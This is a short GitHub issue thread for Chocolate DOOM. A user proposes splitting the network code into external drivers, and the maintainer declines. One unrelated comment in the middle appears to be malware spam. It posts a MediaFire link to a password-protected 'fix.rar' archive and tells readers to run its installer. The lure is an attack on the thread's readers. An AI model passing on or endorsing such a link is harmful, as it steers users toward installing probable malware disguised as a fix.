### ISSUE TITLE
Suggestion: Split the network code into external "drivers", like vanilla DOOM

### ISSUE THREAD

**Issue by Neutral-Markiplier** [chocolate-doom/chocolate-doom#1695]
I don't like how centralized Chocolate DOOM multiplayer is, and I consider its method of connecting to servers "shitty" (and no, I don't mean to make it like Quake's method of connecting in the middle of a game) and too Discord centric (I myself am anti-Discord). Splitting the network code would mean that there would be different ways of how to play multiplayer, even having a DWANGO-like inteface, best of all other people would do the work, not the main Chocolate DOOM developers. But I'm not sure if modern operating systems allow this like DOS.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by fragglet** [comment]
Thanks for the suggestion. I'm going to decline this request.
